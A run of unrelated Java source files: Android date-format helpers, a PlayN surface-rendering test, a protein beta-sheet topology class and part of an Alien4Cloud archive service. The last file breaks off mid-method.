format(CharSequence inFormat, Date inDate) { Calendar c = new GregorianCalendar(); c.setTime(inDate); return format(inFormat, c); } /** * Indicates whether the specified format string contains seconds. * * Always returns false if the input format is null. * * @param inFormat the format string, as described in {@link android.text.format.DateFormat} * * @return true if the format string contains {@link #SECONDS}, false otherwise * * @hide */ public static boolean hasSeconds(CharSequence inFormat) { return hasDesignator(inFormat, SECONDS); } /** * Test if a format string contains the given designator. Always returns * {@code false} if the input format is {@code null}. * * @hide */ public static boolean hasDesignator(CharSequence inFormat, char designator) { if (inFormat == null) return false; final int length = inFormat.length(); int c; int count; for (int i = 0; i < length; i += count) { count = 1; c = inFormat.charAt(i); if (c == QUOTE) { count = skipQuotedText(inFormat, i, length); } else if (c == designator) { return true; } } return false; } private static int skipQuotedText(CharSequence s, int i, int len) { if (i + 1 < len && s.charAt(i + 1) == QUOTE) { return 2; } int count = 1; // skip leading quote i++; while (i < len) { char c = s.charAt(i); if (c == QUOTE) { count++; // QUOTEQUOTE -> QUOTE if (i + 1 < len && s.charAt(i + 1) == QUOTE) { i++; } else { break; } } else { i++; count++; } } return count; } /** * Given a format string and a {@link java.util.Calendar} object, returns a CharSequence * containing the requested date. * @param inFormat the format string, as described in {@link android.text.format.DateFormat} * @param inDate the date to format * @return a {@link CharSequence} containing the requested text */ public static CharSequence format(CharSequence inFormat, Calendar inDate) { SpannableStringBuilder s = new SpannableStringBuilder(inFormat); int count; LocaleData localeData = LocaleData.get(Locale.getDefault()); int len = inFormat.length(); for (int i = 0; i < len; i += count) { count = 1; int c = s.charAt(i); if (c == QUOTE) { count = appendQuotedText(s, i, len); len = s.length(); continue; } while ((i + count < len) && (s.charAt(i + count) == c)) { count++; } String replacement; switch (c) { case 'A': case 'a': replacement = localeData.amPm[inDate.get(Calendar.AM_PM) - Calendar.AM]; break; case 'd': replacement = zeroPad(inDate.get(Calendar.DATE), count); break; case 'c': case 'E': replacement = getDayOfWeekString(localeData, inDate.get(Calendar.DAY_OF_WEEK), count, c); break; case 'K': // hour in am/pm (0-11) case 'h': // hour in am/pm (1-12) { int hour = inDate.get(Calendar.HOUR); if (c == 'h' && hour == 0) { hour = 12; } replacement = zeroPad(hour, count); } break; case 'H': // hour in day (0-23) case 'k': // hour in day (1-24) [but see note below] { int hour = inDate.get(Calendar.HOUR_OF_DAY); // Historically on Android 'k' was interpreted as 'H', which wasn't // implemented, so pretty much all callers that want to format 24-hour // times are abusing 'k'. http://b/8359981. if (false && c == 'k' && hour == 0) { hour = 24; } replacement = zeroPad(hour, count); } break; case 'L': case 'M': replacement = getMonthString(localeData, inDate.get(Calendar.MONTH), count, c); break; case 'm': replacement = zeroPad(inDate.get(Calendar.MINUTE), count); break; case 's': replacement = zeroPad(inDate.get(Calendar.SECOND), count); break; case 'y': replacement = getYearString(inDate.get(Calendar.YEAR), count); break; case 'z': replacement = getTimeZoneString(inDate, count); break; default: replacement = null; break; } if (replacement != null) { s.replace(i, i + count, replacement); count = replacement.length(); // CARE: count is used in the for loop above len = s.length(); } } if (inFormat instanceof Spanned) { return new SpannedString(s); } else { return s.toString(); } } private static String getDayOfWeekString(LocaleData ld, int day, int count, int kind) { boolean standalone = (kind == 'c'); if (count == 5) { return standalone ? ld.tinyStandAloneWeekdayNames[day] : ld.tinyWeekdayNames[day]; } else if (count == 4) { return standalone ? ld.longStandAloneWeekdayNames[day] : ld.longWeekdayNames[day]; } else { return standalone ? ld.shortStandAloneWeekdayNames[day] : ld.shortWeekdayNames[day]; } } private static String getMonthString(LocaleData ld, int month, int count, int kind) { boolean standalone = (kind == 'L'); if (count == 5) { return standalone ? ld.tinyStandAloneMonthNames[month] : ld.tinyMonthNames[month]; } else if (count == 4) { return standalone ? ld.longStandAloneMonthNames[month] : ld.longMonthNames[month]; } else if (count == 3) { return standalone ? ld.shortStandAloneMonthNames[month] : ld.shortMonthNames[month]; } else { // Calendar.JANUARY == 0, so add 1 to month. return zeroPad(month+1, count); } } private static String getTimeZoneString(Calendar inDate, int count) { TimeZone tz = inDate.getTimeZone(); if (count < 2) { // FIXME: shouldn't this be <= 2 ? return formatZoneOffset(inDate.get(Calendar.DST_OFFSET) + inDate.get(Calendar.ZONE_OFFSET), count); } else { boolean dst = inDate.get(Calendar.DST_OFFSET) != 0; return tz.getDisplayName(dst, TimeZone.SHORT); } } private static String formatZoneOffset(int offset, int count) { offset /= 1000; // milliseconds to seconds StringBuilder tb = new StringBuilder(); if (offset < 0) { tb.insert(0, "-"); offset = -offset; } else { tb.insert(0, "+"); } int hours = offset / 3600; int minutes = (offset % 3600) / 60; tb.append(zeroPad(hours, 2)); tb.append(zeroPad(minutes, 2)); return tb.toString(); } private static String getYearString(int year, int count) { return (count <= 2) ? zeroPad(year % 100, 2) : String.format(Locale.getDefault(), "%d", year); } private static int appendQuotedText(SpannableStringBuilder s, int i, int len) { if (i + 1 < len && s.charAt(i + 1) == QUOTE) { s.delete(i, i + 1); return 1; } int count = 0; // delete leading quote s.delete(i, i + 1); len--; while (i < len) { char c = s.charAt(i); if (c == QUOTE) { // QUOTEQUOTE -> QUOTE if (i + 1 < len && s.charAt(i + 1) == QUOTE) { s.delete(i, i + 1); len--; count++; i++; } else { // Closing QUOTE ends quoted text copying s.delete(i, i + 1); break; } } else { i++; count++; } } return count; } private static String zeroPad(int inValue, int inMinDigits) { return String.format(Locale.getDefault(), "%0" + inMinDigits + "d", inValue); } }
// // $Id$ package playn.tests.core; import java.util.ArrayList; import java.util.Arrays; import java.util.List; import pythagoras.f.AffineTransform; import pythagoras.f.FloatMath; import pythagoras.f.Rectangle; import react.RFuture; import react.Slot; import react.UnitSlot; import playn.core.*; import playn.scene.*; public class SurfaceTest extends Test { private TextureSurface paintUpped; public SurfaceTest (TestsGame game) { super(game, "Surface", "Tests various Surface rendering features."); } @Override public void init() { final Image tile = game.assets.getImage("images/tile.png"); final Image orange = game.assets.getImage("images/orange.png"); Slot<Throwable> onError = new Slot<Throwable>() { float errY = 0; public void onEmit (Throwable err) { addDescrip("Error: " + err.getMessage(), 10, errY, game.graphics.viewSize.width()-20); errY += 30; } }; tile.state.onFailure(onError); orange.state.onFailure(onError); RFuture.collect(Arrays.asList(tile.state, orange.state)). onSuccess(imgs -> addTests(orange, tile)); } @Override public void dispose() { super.dispose(); if (paintUpped != null) { paintUpped.close(); paintUpped = null; } } protected void addTests (final Image orange, Image tile) { final Texture otex = orange.texture(); final Texture ttex = tile.createTexture(Texture.Config.DEFAULT.repeat(true, true)); // make samples big enough to force a buffer size increase final int samples = 128, hsamples = samples/2; final float[] verts = new float[(samples+1)*4]; final int[] indices = new int[samples*6]; tessellateCurve(0, 40*(float)Math.PI, verts, indices, x -> (float)Math.sin(x/20)*50); float ygap = 20, ypos = 10; // draw some wide lines ypos = ygap + addTest(10, ypos, new Layer() { protected void paintImpl (Surface surf) { drawLine(surf, 0, 0, 50, 50, 15); drawLine(surf, 70, 50, 120, 0, 10); drawLine(surf, 0, 70, 120, 120, 10); } }, 120, 120, "drawLine with width"); ypos = ygap + addTest(20, ypos, new Layer() { protected void paintImpl (Surface surf) { surf.setFillColor(0xFF0000FF).fillRect(0, 0, 100, 25); // these two alpha fills should look the same surf.setFillColor(0x80FF0000).fillRect(0, 0, 50, 25); surf.setAlpha(0.5f).setFillColor(0xFFFF0000).fillRect(50, 0, 50, 25).setAlpha(1f); } }, 100, 25, "left and right half both same color"); ypos = ygap + addTest(20, ypos, new Layer() { protected void paintImpl (Surface surf) { surf.setFillColor(0xFF0000FF).fillRect(0, 0, 100, 50); surf.setAlpha(0.5f); surf.fillRect(0, 50, 50, 50); surf.draw(otex, 55, 5); surf.draw(otex, 55, 55); surf.setAlpha(1f); } }, 100, 100, "fillRect and drawImage at 50% alpha"); ypos = 10; final TriangleBatch triangleBatch = new TriangleBatch(game.graphics.gl); final AffineTransform af = new AffineTransform(). scale(game.graphics.scale().factor, game.graphics.scale().factor). translate(160, (ygap + 150)); ypos = ygap + addTest(160, ypos, new Layer() { protected void paintImpl (Surface surf) { // fill some shapes with patterns surf.setFillPattern(ttex).fillRect(10, 0, 100, 100); // render a sliding window of half of our triangles to test the slice rendering triangleBatch.addTris(ttex, Tint.NOOP_TINT, af, verts, offset*4, (hsamples+1)*4, ttex.width(), ttex.height(), indices, offset*6, hsamples*6, offset*2); offset += doff; if (offset == 0) doff = 1; else if (offset == hsamples) doff = -1; } private int offset = 0, doff = 1; }.setBatch(triangleBatch), 120, 210, "ImmediateLayer patterned fillRect, fillTriangles"); TextureSurface patted = game.createSurface(100, 100); patted.begin().clear().setFillPattern(ttex).fillRect(0, 0, 100, 100).end().close(); ypos = ygap + addTest(170, ypos, new ImageLayer(patted.texture), "SurfaceImage patterned fillRect"); ypos = 10; // fill a patterned quad in a clipped group layer final int twidth = 150, theight = 75; GroupLayer group = new GroupLayer(); ypos = ygap + addTest(315, 10, group, twidth, theight, "Clipped pattern should not exceed grey rectangle"); group.add(new Layer() { protected void paintImpl (Surface surf) { surf.setFillColor(0xFFCCCCCC).fillRect(0, 0, twidth, theight); } }); group.add(new ClippedLayer(twidth, theight) { protected void paintClipped (Surface surf) { surf.setFillPattern(ttex).fillRect(-10, -10, twidth+20, theight+20); } }); // add a surface layer that is updated on every call to paint // (a bad practice, but one that should actually work) paintUpped = game.createSurface(100, 100); ypos = ygap + addTest(315, ypos, new ImageLayer(paintUpped.texture), "SurfaceImage updated in paint()"); // draw some randomly jiggling dots inside a bounded region final List<ImageLayer> dots = new ArrayList<ImageLayer>(); final Rectangle dotBox = new Rectangle(315, ypos, 200, 100); ypos = ygap + addTest(dotBox.x, dotBox.y, new Layer() { protected void paintImpl (Surface surf) { surf.setFillColor(0xFFCCCCCC).fillRect(0, 0, dotBox.width, dotBox.height); } }, dotBox.width, dotBox.height, "Randomly positioned SurfaceImages"); for (int ii = 0; ii < 10; ii++) { TextureSurface dot = game.createSurface(10, 10); dot.begin(). setFillColor(0xFFFF0000).fillRect(0, 0, 5, 5).fillRect(5, 5, 5, 5). setFillColor(0xFF0000FF).fillRect(5, 0, 5, 5).fillRect(0, 5, 5, 5). end().close(); ImageLayer dotl = new ImageLayer(dot.texture); dotl.setTranslation(dotBox.x + (float)Math.random()*(dotBox.width-10), dotBox.y + (float)Math.random()*(dotBox.height-10)); dots.add(dotl); game.rootLayer.add(dotl); } conns.add(game.paint.connect(clock -> { for (ImageLayer dot : dots) { if (Math.random() > 0.95) { dot.setTranslation(dotBox.x + (float)Math.random()*(dotBox.width-10), dotBox.y + (float)Math.random()*(dotBox.height-10)); } } float now = clock.tick/1000f; float sin = Math.abs(FloatMath.sin(now)), cos = Math.abs(FloatMath.cos(now)); int sinColor = (int)(sin * 255), cosColor = (int)(cos * 255); int c1 = (0xFF << 24) | (sinColor << 16) | (cosColor << 8); int c2 = (0xFF << 24) | (cosColor << 16) | (sinColor << 8); paintUpped.begin().clear(). setFillColor(c1).fillRect(0, 0, 50, 50). setFillColor(c2).fillRect(50, 50, 50, 50). end(); })); } void drawLine(Surface surf, float x1, float y1, float x2, float y2, float width) { float xmin = Math.min(x1, x2), xmax = Math.max(x1, x2); float ymin = Math.min(y1, y2), ymax = Math.max(y1, y2); surf.setFillColor(0xFF0000AA).fillRect(xmin, ymin, xmax-xmin, ymax-ymin); surf.setFillColor(0xFF99FFCC).drawLine(x1, y1, x2, y2, width); surf.setFillColor(0xFFFF0000).fillRect(x1, y1, 1, 1).fillRect(x2, y2, 1, 1); } private interface F { public float apply (float x); } void tessellateCurve (float minx, float maxx, float[] verts, int[] indices, F f) { int slices = (verts.length-1)/4, vv = 0; float dx = (maxx-minx)/slices; for (float x = minx; vv < verts.length; x += dx) { verts[vv++] = x; verts[vv++] = 0; verts[vv++] = x; verts[vv++] = f.apply(x); } for (int ss = 0, ii = 0; ss < slices; ss++) { int base = ss*2; indices[ii++] = base; indices[ii++] = base+1; indices[ii++] = base+3; indices[ii++] = base; indices[ii++] = base+3; indices[ii++] = base+2; } } }
package ProGAL.proteins.belta; import java.util.ArrayList; import java.util.Arrays; import java.util.Collections; import java.util.List; import java.util.Set; import java.util.TreeSet; /** * Representation of the topology of a single sheet. Where the BetaTopology is represented * using a pairing matrix, the sheet topology uses a list of strand pairs that can be accessed * via the public <code>strandPairs</code> field. The list of strand pairs is ordered such that * the pairs follow the order along the sheet, and the first strand from the N-terminal is in * the first half of the list. * * <code>getStrandOrder</code> and </code>getStrandOrientation</code> are alternative methods * to access the topology. The following example shows the relationship between the pairing- * matrix in the beta-topology and the order and orientation-arrays. * <pre> * SecondaryStructure ss = new SecondaryStructure(" EE EE EE EE "); * //Beta-topology with a single sheet * BetaTopology bTop = new BetaTopology(ss); * bTop.setPaired(1,0); * bTop.setPaired(2,0); * bTop.setPaired(2,3); * SheetTopology sTop = new SheetTopology(bTop,0); * System.out.println(sTop.getStrandOrderString()); //Prints "1 0 2 3" * System.out.println(sTop.getStrandOrientationString()); //Prints "1110" * </pre> * @author R.Fonseca */ public class SheetTopology{ /** The secondary structure that the sheet-topology is related to */ public final SecondaryStructure secondaryStructure; /** An ordered list of strand-pairs. The order follows the order of pairs when * "climbing" the sheet-ladder from one end to the other. The first strand from * the N-terminal is in the first half of this list. If it is in the middle, then * the second strand is in the first half. This corresponds to the convention in * Ruczinskis paper.*/ public final List<StrandPair> strandPairs = new ArrayList<StrandPair>(); /** A sorted list of strand-indices. A strand-index is used in the * <code>secondaryStructure.getStrands()</code>-array.*/ public final List<Integer> strands = new ArrayList<Integer>(); /** * Construct the sheet containing the specified strand. The order of the * strandPairs list will be such that the lowest index strand will be in the first * half of the list. If it is in the center the second-lowest index strand will * be in the first part of the list. */ public SheetTopology(BetaTopology bTop, int strand){ this.secondaryStructure = bTop.secondaryStructure; ArrayList<StrandPair> tmp = new ArrayList<StrandPair>(); Set<Integer> fringe = new TreeSet<Integer>(); fringe.add(strand); while(!fringe.isEmpty()){ Integer s0 = fringe.iterator().next(); fringe.remove(s0); for(int s=0;s<bTop.N;s++){ if(bTop.pair(s0,s) && !pairExists(tmp, s0,s)) { tmp.add(new StrandPair(s0,s,s<s0)); fringe.add(s); } if(bTop.pair(s,s0) && !pairExists(tmp, s0,s)){ tmp.add(new StrandPair(s0,s,s>s0)); fringe.add(s); } } } if(tmp.isEmpty()){ System.out.println("Sheet(...) tmp empty .. "); } //Store all strands for(StrandPair bp: tmp){ if(!strands.contains(bp.strand1)) strands.add(bp.strand1); if(!strands.contains(bp.strand2)) strands.add(bp.strand2); Collections.sort(strands); } //Sort the sheets // Find an edge strand int[] pairs = new int[bTop.N]; for(int s=0;s<bTop.N;s++) pairs[s] = 0; for(StrandPair bp: tmp){ pairs[bp.strand1]++; pairs[bp.strand2]++; } int edgeStrand = -1; for(int s=0;s<bTop.N;s++) if(pairs[s]==1){ edgeStrand = s; break; } // Sort int nextStrand = edgeStrand; if(nextStrand<0) {//Its a barrel nextStrand = tmp.get(0).strand1; while(!tmp.isEmpty()){ StrandPair nextPair = null; for(StrandPair bp: tmp) if(bp.contains(nextStrand)) { nextPair = bp; break;} strandPairs.add(nextPair); tmp.remove(nextPair); if(nextPair.strand2==nextStrand){ int t = nextPair.strand1; nextPair.strand1 = nextPair.strand2; nextPair.strand2 = t; } nextStrand = strandPairs.get(strandPairs.size()-1).strand2; } }else{ while(!tmp.isEmpty()){ StrandPair nextPair = null; for(StrandPair bp: tmp) if(bp.contains(nextStrand)) { nextPair = bp; break;} strandPairs.add(nextPair); tmp.remove(nextPair); if(nextPair.strand2==nextStrand){ int t = nextPair.strand1; nextPair.strand1 = nextPair.strand2; nextPair.strand2 = t; } nextStrand = strandPairs.get(strandPairs.size()-1).strand2; } } //Find the min-index strand and ensure that it occurs early in the list int minStrand = Integer.MAX_VALUE; int minIdx = -1, c = 0; for(StrandPair bp: strandPairs){ if(minStrand>bp.strand1) { minStrand = bp.strand1; minIdx = c; } c++; } if(strands.size()%2==1 && minIdx==(strands.size()/2)){ //Repeat for the second lowest strand; c=0; int minStrand2 = Integer.MAX_VALUE; for(StrandPair bp: strandPairs){ if(bp.strand1<minStrand2 && bp.strand1!=minStrand){ minStrand2 = bp.strand1; minIdx = c; } c++; } } if(minIdx>=strands.size()/2){ //Reverse list Collections.reverse(strandPairs); for(StrandPair bp: strandPairs) { int t=bp.strand1; bp.strand1=bp.strand2; bp.strand2 = t; } } } /** * Return true if the specified strand is in this sheet. * @param strand A strand-index (i.e. an index in the * <code>secondaryStructure.getStrands()</code>-array). */ public boolean containsStrand(int strand){ return strands.contains(strand); } /** * Return an array indicating the strand order. This method can be more * convenient than traversing the strand-pairs in order. */ public int[] getStrandOrder(){ int[] ret = new int[strandPairs.size()+1]; for(int i=0;i<strandPairs.size();i++) ret[i] = strandPairs.get(i).strand1; ret[ret.length-1] = strandPairs.get(strandPairs.size()-1).strand2; return ret; } /** * Return an array indicating the normalized strand order. Members of the normalized * order refers to indexes in the <code>SheetTopology.this.strands</code>-array and * not to <code>SheetTopology.this.secondaryStructure.getStrands()</code> as strand- * indices usually do. */ public int[] getNormalizedStrandOrder(){ int[] realOrder = getStrandOrder(); int[] sortedOrder = getStrandOrder(); Arrays.sort(sortedOrder); int[] normOrder = new int[sortedOrder.length]; for(int i=0;i<sortedOrder.length;i++){ normOrder[i] = indexOf(realOrder[i], sortedOrder); } return normOrder; } /** * Return an array indicating orientation of strands. A 1-entry indicates the strand * is pointing up and a 0-entry down. */ public int[] getStrandOrientation(){ boolean lastUp = true; boolean[] ups = new boolean[strands.size()]; int c=0; ups[c++] = lastUp; for(StrandPair bp: strandPairs){ if(!lastUp && !bp.parallel) lastUp = true; else if(lastUp && !bp.parallel) lastUp = false; ups[c++] = lastUp; } int minStrand = getMinStrand(); c=0; for(StrandPair bp: strandPairs){ if(bp.strand1==minStrand){ if(!ups[c]) for(c=0;c<ups.length;c++) ups[c] = !ups[c]; break; } c++; } int[] ret = new int[strands.size()]; c=0; for(Boolean up: ups) ret[c++] = up?1:0; return ret; } public String toString(){ return "Sheet< "+getStrandOrderString()+", "+getStrandOrientationString()+" >"; } /** String representation of strand order. */ public String getStrandOrderString(){ StringBuilder sb = new StringBuilder(); for(StrandPair bp: strandPairs){ sb.append(bp.strand1+" "); } sb.append(strandPairs.get(strandPairs.size()-1).strand2); return sb.toString(); } /** String representation of strand orientation. */ public String getStrandOrientationString(){ StringBuilder ret = new StringBuilder(); boolean lastUp = true; boolean[] ups = new boolean[strands.size()]; int c=0; ups[c++] = lastUp; for(StrandPair bp: strandPairs){ if(!lastUp && !bp.parallel) lastUp = true; else if(lastUp && !bp.parallel) lastUp = false; if(c==strands.size()) break; ups[c++] = lastUp; } int minStrand = getMinStrand(); c=0; for(StrandPair bp: strandPairs){ if(bp.strand1==minStrand){ if(!ups[c]) for(c=0;c<ups.length;c++) ups[c] = !ups[c]; break; } c++; } for(Boolean up: ups) ret.append(up?"1":"0"); return ret.toString(); } private int getMinStrand(){ int minStrand = strandPairs.get(0).strand1; for(StrandPair bp: strandPairs){ if(bp.strand1<minStrand) minStrand = bp.strand1; } int t= strandPairs.get(strandPairs.size()-1).strand2; if(t<minStrand) minStrand = t; return minStrand; } private static int indexOf(int c, int[] array){ for(int i=0;i<array.length;i++) if(array[i]==c) return i; return -1; } private static boolean pairExists(List<StrandPair> bPairs, int s1, int s2){ for(StrandPair bp: bPairs){ if( (bp.strand1==s1 && bp.strand2==s2)||(bp.strand1==s2&&bp.strand2==s1) ) return true; } return false; } /** * A pair of strands specified by two strand-indices (i.e. indices in the * <code>secondaryStructure.getStrands()</code>-array). */ public static class StrandPair{ public int strand1, strand2; public final boolean parallel; private StrandPair(int strand1, int strand2, boolean parallel){ this.strand1 = Math.min(strand1,strand2); this.strand2 = Math.max(strand1,strand2); this.parallel = parallel; } boolean contains(int strand){ return strand1==strand || strand2==strand; } } }
package org.alien4cloud.tosca.catalog.index; import static alien4cloud.dao.FilterUtil.fromKeyValueCouples; import java.util.Date; import java.util.List; import java.util.Objects; import java.util.Set; import java.util.stream.Collectors; import javax.annotation.Resource; import javax.inject.Inject; import org.alien4cloud.tosca.catalog.ArchiveDelegateType; import org.alien4cloud.tosca.catalog.events.AfterArchiveDeleted; import org.alien4cloud.tosca.catalog.events.ArchiveUsageRequestEvent; import org.alien4cloud.tosca.catalog.events.BeforeArchiveDeleted; import org.alien4cloud.tosca.catalog.repository.CsarFileRepository; import org.alien4cloud.tosca.model.CSARDependency; import org.alien4cloud.tosca.model.Csar; import org.alien4cloud.tosca.model.templates.Topology; import org.apache.commons.lang3.ArrayUtils; import org.elasticsearch.index.query.QueryBuilder; import org.elasticsearch.index.query.QueryBuilders; import org.springframework.context.ApplicationEventPublisher; import org.springframework.stereotype.Component; import com.google.common.collect.Lists; import com.google.common.collect.Sets; import alien4cloud.application.ApplicationService; import alien4cloud.dao.IGenericSearchDAO; import alien4cloud.dao.model.GetMultipleDataResult; import alien4cloud.exception.AlreadyExistException; import alien4cloud.exception.DeleteReferencedObjectException; import alien4cloud.exception.NotFoundException; import alien4cloud.model.application.Application; import alien4cloud.model.common.Usage; import alien4cloud.model.orchestrators.locations.Location; import alien4cloud.utils.AlienConstants; import lombok.extern.slf4j.Slf4j; /** * Manages cloud services archives and their dependencies. */ @Component @Slf4j public class CsarService { @Inject private ApplicationEventPublisher publisher; @Resource(name = "alien-es-dao") private IGenericSearchDAO csarDAO; @Inject private IToscaTypeIndexerService indexerService; @Inject private CsarFileRepository alienRepository; @Inject private ApplicationService applicationService; /** * Check if a given archive exists in any workspace. * * @param name The name of the archive. * @param version The version of the archive. * @return Return the matching */ public boolean exists(String name, String version) { return csarDAO.buildQuery(Csar.class).setFilters(fromKeyValueCouples("version", version, "name", name)).count() > 0; } /** * Check that a CSAR name/version does not already exists in the repository and eventually throw an AlreadyExistException. * * @param name The name of the archive. * @param version The version of the archive. */ public void ensureUniqueness(String name, String version) { if (exists(name, version)) { throw new AlreadyExistException("CSAR: " + name + ", Version: " + version + " already exists in the repository."); } } /** * Get a cloud service archive. * * @param name The name of the archive. * @param version The version of the archive. * @return The {@link Csar Cloud Service Archive} if found in the repository or null. */ public Csar get(String name, String version) { return csarDAO.buildQuery(Csar.class).setFilters(fromKeyValueCouples("name", name, "version", version)).prepareSearch().find(); } /** * * Get a cloud service archive. * * @param id The id of the archive to retrieve * @return */ public Csar get(String id) { return csarDAO.findById(Csar.class, id); } /** * @return an array of CSARs that depend on this name:version. */ public Csar[] getDependantCsars(String name, String version) { QueryBuilder notSelf = QueryBuilders //.notQuery(QueryBuilders.andQuery(QueryBuilders.termQuery("name", name), QueryBuilders.termQuery("version", version))); .boolQuery() .mustNot ( QueryBuilders.boolQuery() .must(QueryBuilders.termQuery("name", name)) .must(QueryBuilders.termQuery("version", version))); GetMultipleDataResult<Csar> result = csarDAO.buildQuery(Csar.class).prepareSearch() .setFilters(fromKeyValueCouples("dependencies.name", name, "dependencies.version", version), notSelf).search(0, 10000); return result.getData(); } /** * Get teh topologies that depends on this csar. * Do not return a topology if this csar is his own * * @return an array of <code>Topology</code>s that depend on this name:version. */ public Topology[] getDependantTopologies(String name, String version) { QueryBuilder notSelf = QueryBuilders //.notQuery(QueryBuilders.andQuery(QueryBuilders.termQuery("archiveName", name), QueryBuilders.termQuery("archiveVersion", version))); .boolQuery() .mustNot ( QueryBuilders.boolQuery() .must(QueryBuilders.termQuery("archiveName", name)) .must(QueryBuilders.termQuery("archiveVersion", version))); GetMultipleDataResult<Topology> result = csarDAO.buildQuery(Topology.class).prepareSearch() .setFilters(fromKeyValueCouples("dependencies.name", name, "dependencies.version", version), notSelf).search(0, 10000); return result.getData(); } public List<Csar> getTopologiesCsar(Topology... topologies) { Set<String> ids = Sets.newHashSet(); for (Topology topology : topologies) { ids.add(topology.getId()); } return csarDAO.findByIds(Csar.class, ids.toArray(new String[ids.size()])); } /** * @return an array of CSARs that depend on this name:version. */ public Location[] getDependantLocations(String name, String version) { GetMultipleDataResult<Location> result = csarDAO.buildQuery(Location.class) .setFilters(fromKeyValueCouples("dependencies.name", name, "dependencies.version", version)).prepareSearch().search(0, 10000); return result.getData(); } /** * Save a Cloud Service Archive in ElasticSearch. * * @param csar The csar to save. */ public void save(Csar csar) { // save the csar import date csar.setImportDate(new Date()); this.csarDAO.save(csar); } /** * Set dependencies to an existing CSAR given its Id, and save it. * <p> * See {@link CsarService#setDependencies(String, Set)} * </p> * * * @param csarId id of the CSAR * @param dependencies the new dependencies */ public void setDependencies(String csarId, Set<CSARDependency> dependencies) { Csar csar = getOrFail(csarId); setDependencies(csar, dependencies); } /** * Set the dependencies of a given csar to the provided set. * <p> * This method will remove ,if present, the provided <b>csar</b> from the provided set of <b>dependencies</b>, to avoid cyclic dependencies on itself. * </p> * Note that no saving operation is perform here * * @param csar: The csar we want to set the dependencies * @param dependencies The provided dependencies to use. */ public void setDependencies(Csar csar, Set<CSARDependency> dependencies) { csar.setDependencies(remove(csar, dependencies)); save(csar); } /** * remove a csar from a set of dependencies * * @param csar * @param from * @return */ private Set<CSARDependency> remove(Csar csar, Set<CSARDependency> from) { CSARDependency toRemove = new CSARDependency(csar.getName(), csar.getVersion()); return from == null ? null : from.stream().filter(csarDependency -> !Objects.equals(toRemove, csarDependency)).collect(Collectors.toSet()); } /** * Get a cloud service archive, or fail if not found * * @param id The id of the archive to retrieve * @return The {@link Csar Cloud Service Archive} if found in the repository */ public Csar getOrFail(String id) { Csar csar = get(id); if (csar == null) { throw new NotFoundException("Csar with id [" + id + "] do not exist"); } return csar; } /** * Get a cloud service archive, or fail with {@link NotFoundException} if not found * * @param name The name of the archive. * @param version The version of the archive. * @return The {@link Csar Cloud Service Archive} if found in the repository. */ public Csar getOrFail(String name, String version) { return getOrFail(Csar.createId(name, version)); } /** * @return true if the CSar is a dependency for another or used in a topology. */ public boolean isDependency(String csarName, String csarVersion) { // a csar that is a dependency of another csar Csar[] result = getDependantCsars(csarName, csarVersion); if (result != null && result.length > 0) { return true; } // check if some of the nodes are used in topologies. Topology[] topologies = getDependantTopologies(csarName, csarVersion); return topologies != null && topologies.length > 0; } /** * Delete an archive. * <p> * Unlike {@link CsarService#deleteCsar(String)}, the archive will be deleted regardless if it is used as a dependency somewhere. * </p> * * @param csarId The id of the archive to delete. */ public void forceDeleteCsar(String csarId) { Csar csar = getOrFail(csarId); deleteCsar(csar); } /** * Delete an archive if no topology depends from it. * * @param csarId The id of the archive to delete. * @throws DeleteReferencedObjectException If the csar is a dependency of another csar or topology */ public void deleteCsar(String csarId) { Csar csar = getOrFail(csarId); // a csar that is a dependency of another csar can not be deleted if (isDependency(csar.getName(), csar.getVersion())) { throw new DeleteReferencedObjectException("This csar can not be deleted since it's a dependencie for others"); } deleteCsar(csar); } public void deleteCsar(Csar csar) { // dispatch event before indexing publisher.publishEvent(new BeforeArchiveDeleted(this, csar.getId())); deleteCsarContent(csar); csarDAO.delete(Csar.class, csar.getId()); // physically delete files alienRepository.removeCSAR(csar.getName(), csar.getVersion()); // dispatch event before indexing publisher.publishEvent(new AfterArchiveDeleted(this, csar.getId())); } /** * Delete the content of the csar from the repository: elements, topologies * * @param csar */ public void deleteCsarContent(Csar csar) { // Delete the topology defined in this archive. csarDAO.delete(Topology.class, csar.getId()); // latest version indicator will be recomputed to match this new reality indexerService.deleteElements(csar.getName(), csar.getVersion()); } /** * Delete an archive an all its registered / saved elements * Abort the deletion if the archive is used by some resources * * @param csar * @return A List of {@link Usage} representing the resources using this archive. */ public List<Usage> deleteCsarWithElements(Csar csar) { // if the csar is bound to an application, then do not allow the process if (Objects.equals(csar.getDelegateType(), ArchiveDelegateType.APPLICATION.toString())) { throw new UnsupportedOperationException("Cannot delete an application csar from here "); } List<Usage> relatedResourceList = getCsarRelatedResourceList(csar); if (relatedResourceList.isEmpty()) { deleteCsar(csar); } return relatedResourceList; } /** * Get the list of resources that are using the given archive. * * @param csar The archive for which to get usage. * @return The list of usage of the archive. */ public List<Usage> getCsarRelatedResourceList(Csar csar) { if (csar == null) { log.debug("You have requested a resource list for a invalid csar object : <" + csar + ">"); return Lists.newArrayList(); } ArchiveUsageRequestEvent archiveUsageRequestEvent = new ArchiveUsageRequestEvent(this, csar.getName(), csar.getVersion()); // Archive from applications are used by the application. if (Objects.equals(csar.getDelegateType(), ArchiveDelegateType.APPLICATION.toString())) { // The CSAR is from an application's topology Application application = applicationService.checkAndGetApplication(csar.getDelegateId()); archiveUsageRequestEvent .addUsage(new Usage(application.getName(), Application.class.getSimpleName().toLowerCase(), csar.getDelegateId(), csar.getWorkspace())); } // a csar that is a dependency of another csar can not be deleted Csar[] relatedCsars = getDependantCsars(csar.getName(), csar.getVersion()); if (ArrayUtils.isNotEmpty(relatedCsars)) { archiveUsageRequestEvent.addUsages(generateCsarsInfo(relatedCsars)); } // check if some of the nodes are used in topologies. Topology[] topologies = getDependantTopologies(csar.getName(), csar.getVersion()); if (topologies != null && topologies.length > 0) { archiveUsageRequestEvent.addUsages(generateTopologiesInfo(topologies)); } // a csar that is a dependency of location can not be deleted Location[] relatedLocations = getDependantLocations(csar.getName(), csar.getVersion()); if (relatedLocations != null && relatedLocations.length > 0) { archiveUsageRequestEvent.addUsages(generateLocationsInfo(relatedLocations)); } publisher.publishEvent(archiveUsageRequestEvent); return archiveUsageRequestEvent.getUsages(); } /** * Generate resources related to a csar list * * @param csars * @return */ public List<Usage> generateCsarsInfo(Csar[] csars) { String resourceName; String resourceId; List<Usage> resourceList = Lists.newArrayList(); for (Csar csar : csars) { if (ArchiveDelegateType.APPLICATION.toString().equals(csar.getDelegateType())) { Application application = applicationService.checkAndGetApplication(csar.getDelegateId()); resourceName = application.getName(); } else { resourceName = csar.getName(); } Usage temp = new Usage(resourceName, Csar.class.getSimpleName().toLowerCase(), 